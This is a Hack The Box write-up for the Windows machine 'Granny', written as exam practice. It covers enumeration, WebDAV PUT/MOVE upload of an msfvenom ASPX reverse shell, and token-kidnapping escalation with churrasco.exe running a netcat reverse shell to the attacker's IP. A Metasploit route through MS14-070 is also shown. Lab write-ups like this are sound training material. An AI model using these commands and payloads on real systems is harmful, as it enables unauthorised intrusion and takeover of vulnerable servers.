Hack The Box: Granny Write-up (#34)

10 min readNov 13, 2020

This is my 34th box out of 42 boxes for OSCP preparation. I am doing my best learning and mastering the key skills for my upcoming OSCP exams by writing this series of blogs. So let’s begin.

Reconnaissance

As usual, run a full TCP scan.

nmap -sC -sV -O -p- -oA nmap/full 10.10.10.15

-sC: Default Nmap script
-sV: Service/version info
-O: Enable OS detection
-oA: Output scan results in 3 different formats
-p-: Scan all ports from 1–65535

We get the back the following result:

Port 80: — Running HTTP service, Microsoft IIS httpd 6.0.

Nmap scan report for 10.10.10.15
Host is up (0.0090s latency).
Not shown: 65534 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
| http-methods: 
|_  Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan: 
|   Server Date: Wed, 09 Sep 2020 07:04:07 GMT
|   Server Type: Microsoft-IIS/6.0
|   WebDAV type: Unknown
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
|_  Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH

Only port 80 is open.

Let’s make quick mental notes.

This will be most likely the entry for our initial foothold to the box. The result is very obvious that the server using an outdated version of Microsoft-IIS and is using the WebDAV protocol. A quick Google search for this says WebDAV is a protocol whose basic functionality includes enabling users to share, copy, move and edit files through a web server. From the Nmap results, we have immediate attention to the number of ‘Allowed Methods’. PUT, MOVE, COPY and DELETE are dangerous HTTP methods that allow you to create, move and delete files on the web server.

Service Enumeration

Port 80 (HTTP service)

Let’s visit the page.

Nothing interesting here. Let’s run the gobuster scan.

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.15/ -t 50 -o gobuster.txt

-w: Wordlist
-u: URL of the target
-t: Number of thread
-o: Output file

We get back the following results.

http://10.10.10.15:80/_private (Status: 301) [Size: 156]
http://10.10.10.15:80/_vti_log (Status: 301) [Size: 158]
http://10.10.10.15:80/_vti_inf.html (Status: 200) [Size: 1754]
http://10.10.10.15:80/_vti_bin (Status: 301) [Size: 158]
http://10.10.10.15:80/_vti_bin/_vti_adm/admin.dll (Status: 200) [Size: 195]
http://10.10.10.15:80/_vti_bin/_vti_aut/author.dll (Status: 200) [Size: 195]
http://10.10.10.15:80/_vti_bin/shtml.dll (Status: 200) [Size: 96]
http://10.10.10.15:80/aspnet_client (Status: 301) [Size: 161]
http://10.10.10.15:80/images (Status: 301) [Size: 152]
http://10.10.10.15:80/Images (Status: 301) [Size: 152]
http://10.10.10.15:80/postinfo.html (Status: 200) [Size: 2440]

Look into the directories and files that gobuster found. We don’t find anything useful.

Let’s run the Nikto scan as well.

nikto -h 10.10.10.15

-h: Target IP.

We get back the following results.

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.15
+ Target Hostname:    10.10.10.15
+ Target Port:        80
+ Start Time:         2020-09-09 06:09:10 (GMT8)
---------------------------------------------------------------------------
+ Server: Microsoft-IIS/6.0
+ Retrieved microsoftofficewebserver header: 5.0_Pub
+ Retrieved x-powered-by header: ASP.NET
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'microsoftofficewebserver' found, with contents: 5.0_Pub
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-aspnet-version header: 1.1.4322
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-397: HTTP method 'PUT' allows clients to save files on the web server.
+ OSVDB-5646: HTTP method 'DELETE' allows clients to delete files on the web server.
+ Retrieved dasl header: <DAV:sql>
+ Retrieved dav header: 1, 2
+ Retrieved ms-author-via header: MS-FP/4.0,DAV
+ Uncommon header 'ms-author-via' found, with contents: MS-FP/4.0,DAV
+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH 
+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5647: HTTP method ('Allow' Header): 'MOVE' may allow clients to change file locations on the web server.
+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH 
+ OSVDB-5646: HTTP method ('Public' Header): 'DELETE' may allow clients to remove files on the web server.
+ OSVDB-397: HTTP method ('Public' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5647: HTTP method ('Public' Header): 'MOVE' may allow clients to change file locations on the web server.
+ WebDAV enabled (PROPPATCH SEARCH PROPFIND LOCK UNLOCK MKCOL COPY listed as allowed)
+ OSVDB-13431: PROPFIND HTTP verb may show the server's internal IP address: http://granny/_vti_bin/_vti_aut/author.dll
+ OSVDB-396: /_vti_bin/shtml.exe: Attackers may be able to crash FrontPage by requesting a DOS device, like shtml.exe/aux.htm -- a DoS was not attempted.
+ OSVDB-3233: /postinfo.html: Microsoft FrontPage default file found.
+ OSVDB-3233: /_private/: FrontPage directory found.
+ OSVDB-3233: /_vti_bin/: FrontPage directory found.
+ OSVDB-3233: /_vti_inf.html: FrontPage/SharePoint is installed and reveals its version number (check HTML source for more information).
+ OSVDB-3300: /_vti_bin/: shtml.exe/shtml.dll is available remotely. Some versions of the Front Page ISAPI filter are vulnerable to a DOS (not attempted).
+ OSVDB-3500: /_vti_bin/fpcount.exe: Frontpage counter CGI has been found. FP Server version 97 allows remote users to execute arbitrary system commands, though a vulnerability in this version could not be confirmed. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1376. http://www.securityfocus.com/bid/2252.
+ OSVDB-67: /_vti_bin/shtml.dll/_vti_rpc: The anonymous FrontPage user is revealed through a crafted POST.
+ /_vti_bin/_vti_adm/admin.dll: FrontPage/SharePoint file found.
+ 8018 requests: 0 error(s) and 32 item(s) reported on remote host
+ End Time:           2020-09-09 06:10:33 (GMT8) (83 seconds)

Nikto also confirmed the number of ‘Allowed HTTP Methods’. Let’s test PUT method to create a file on the web server. Since this server running Microsoft-IIS service web server, the type of file it executes are ASP and ASPX. We can use davtest tool to automate the type of files it can create on the web server using the PUT method. Let’s test it out.

davtest --url http://10.10.10.15

We back the following results.

Both ASP and ASPX are not allowed. But HTML and TXT file extension allowed to create. We also know from the Nmap scan, MOVE method is allowed. We can create an HTML file with our reverse shell payload and use MOVE method to rename the file to ASPX. This is a possible assumption. Let’s test this with the curl command.

The file is created and we can access the file. Next, rename the file to ASPX with MOVE method.

root@kali:/htb/Granny/10.10.10.15/recon# curl -X MOVE --header 'Destination:http://10.10.10.15/test.aspx' 'http://10.10.10.15/test.html'root@kali:/htb/Granny/10.10.10.15/recon# curl http://10.10.10.15/test.aspx
This is a testroot

It works as expected.

Exploitation

Let’s generate MSFVenom payload with file format ASPX.

msfvenom -p windows/shell_reverse_tcp -f aspx lhost=10.10.14.31 lport=53 -o shell.aspx

-p: Payload
-f: File format
lhost: Kali Linux IP (attacker’s machine IP)
lport: The port you want the reverse shell to be connected
-o: Output filename

Rename the file.

mv shell.aspx shell.txt

Then upload the file on the web server and rename the file extension to ASPX.

root@kali:/htb/Granny/10.10.10.15/recon# curl -X PUT http://10.10.10.15/shell.txt --data-binary @shell.txtroot@kali:/htb/Granny/10.10.10.15/recon# curl -X MOVE --header 'Destination:http://10.10.10.15/shell.aspx' 'http://10.10.10.15/shell.txt'

Next, set up a Netcat listener in our Kali Linux.

root@kali:/htb/Granny# nc -nlvp 53
listening on [any] 53 ...

Execute the shell.aspx file either through the browser or curl command to send a shell back to our Kali Linux.

We get a shell! Unfortunately, we don’t have permission to read the user.txt file. For this, we need to escalate privilege.

You will notice that this shell keep disconnecting after 40 seconds.

Privilege Escalation

Now download the Windows Exploit Suggester to identify missing patches on the Windows target machine that could potentially allow us to escalate privileges.

git clone  https://github.com/AonCyberLabs/Windows-Exploit-Suggester.git

Next, install the dependencies.

pip install xlrd --upgrade

Update the database.

./windows-exploit-suggester.py --update

It downloads the security bulletin database from Microsoft and saves it as an excel spreadsheet in the current working directory.

Run the systeminfo command on the target machine and copy the output and save in your Kali Linux.

C:\WINDOWS\Temp>systeminfo
systeminfoHost Name:                 GRANNY
OS Name:                   Microsoft(R) Windows(R) Server 2003, Standard Edition
OS Version:                5.2.3790 Service Pack 2 Build 3790
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Uniprocessor Free
Registered Owner:          HTB
Registered Organization:   HTB
Product ID:                69712-296-0024942-44782
Original Install Date:     4/12/2017, 5:07:40 PM
System Up Time:            0 Days, 10 Hours, 40 Minutes, 56 Seconds
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x86 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
BIOS Version:              INTEL  - 6040000
Windows Directory:         C:\WINDOWS
System Directory:          C:\WINDOWS\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (GMT+02:00) Athens, Beirut, Istanbul, Minsk
Total Physical Memory:     1,023 MB
Available Physical Memory: 776 MB
Page File: Max Size:       2,470 MB
Page File: Available:      2,312 MB
Page File: In Use:         158 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 1 Hotfix(s) Installed.
                           [01]: Q147222
Network Card(s):           N/A

Next, run the windows-exploit-suggester.

python /opt/Windows-Exploit-Suggester/windows-exploit-suggester.py --database /opt/Windows-Exploit-Suggester/2020-09-09-mssb.xls --systeminfo systeminfo.txt

It output many vulnerabilities. I tried most of them, but none of them worked. Since we have a reverse shell in the context of “network service” a service account, we might need to check the privileges.

The account has SeAssignPrimaryTokenPrivilege and SeImpersonatePrivilege enabled. We can use token impersonation techniques to escalate privilege to SYSTEM shell. We can do this by using JuicyPotato (x86 architecture) tool. Download the file on Kali Linux. Next, generate MSFvenom payload with file format exe.

msfvenom -p windows/shell_reverse_tcp -f exe lhost=10.10.14.31 lport=53 -o reverse.exe

Set up SMB share on our Kali Linux where you placed the JuicyPotato and reverse.exe files. Give a name to your share (my share name is ‘tools’).

python /usr/share/doc/python3-impacket/examples/smbserver.py tools .

Copy these 2 files (reverse.exe and JuicyPotato.exe) to the target machine.

copy \\10.10.14.31\tools\JuicyPotato-x86.exe C:\WINDOWS\TEMP\JuicyPotato-x86.execopy \\10.10.14.31\tools\reverse.exe C:\WINDOWS\TEMP\reverse.exe

Set a new Netcat listener on Kali Linux.

nc -nlvp 443

Next, run the following commands from the target machine.

C:\WINDOWS\TEMP\JuicyPotato.exe -l 1337 -p C:\WINDOWS\TEMP\reverse.exe -t * -c {03ca98d6-ff5d-49b8-abc6-03dd84127020}

I still not getting a SYSTEM reverse shell. Seems like something blocking this file from executing it. After did some research for windows 2003 SP2 exploits, I got this page sharing about ‘Windows Privelege Escalation via Token Kidnapping’ vulnerability. The executable exploit file for this vulnerability can be found here. Download the exploit to Kali Linux and transfer to the target machine. This exploit will take command as an argument and execute it with SYSTEM privilege.

Nice! Since we know this shell is not stable all we have to do is copy and paste command as fast as we can. I copied the nc.exe binary to the target machine. Then set up a Netcat listener in our Kali Linux.

nc -nlvp 443

Then from the target machine run the following command.

C:\WINDOWS\TEMP\churrasco.exe "C:\WINDOWS\TEMP\nc.exe 10.10.14.31 443 -e cmd.exe"

Go back to the listener. We get a SYSTEM shell.

Get the user flag.

Get the root flag.

Extra Contents (With Metasploit)

Since the above method is very torturing due to the instability of the shell, I decided to do this in the Metasploit module as well.

First, generate a meterpreter reverse shell payload.

msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.14.31 lport=53 -f aspx -o mshell.aspx

Rename the file to TXT and upload the file as we did earlier using the curl command.

root@kali:/htb/Granny/10.10.10.15/recon# mv mshell.aspx mshell.txt
root@kali:/htb/Granny/10.10.10.15/recon# curl -X PUT http://10.10.10.15/mshell.txt --data-binary @mshell.txt
root@kali:/htb/Granny/10.10.10.15/recon# curl -X MOVE --header 'Destination:http://10.10.10.15/mshell.aspx' 'http://10.10.10.15/mshell.txt'

Startup your Metasploit and configure as below.

root@kali:~# msfconsole -q
msf5 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcpmsf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcpmsf5 exploit(multi/handler) > set lhost 10.10.14.31
lhost => 10.10.14.31
msf5 exploit(multi/handler) > set lport 53
lport => 53
msf5 exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.[*] Started reverse TCP handler on 10.10.14.31:53

Next, execute the uploaded meterpreter reverse shell payload with the curl command.

curl http://10.10.10.15/mshell.aspx

Check the multi handler. A new session is opened.

We get a stable meterpreter shell. Next, use the local exploit suggester module to see which exploits the system vulnerable to.

We’ll test the 3rd exploit, MS14–070.

msf5 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms14_070_tcpip_ioctl
[*] Using configured payload windows/meterpreter/reverse_tcp
msf5 exploit(windows/local/ms14_070_tcpip_ioctl) > set lhost 10.10.14.31
lhost => 10.10.14.31
msf5 exploit(windows/local/ms14_070_tcpip_ioctl) > set lport 443
lport => 443
msf5 exploit(windows/local/ms14_070_tcpip_ioctl) > set sessions 5
msf5 exploit(windows/local/ms14_070_tcpip_ioctl) > run

We get a new session.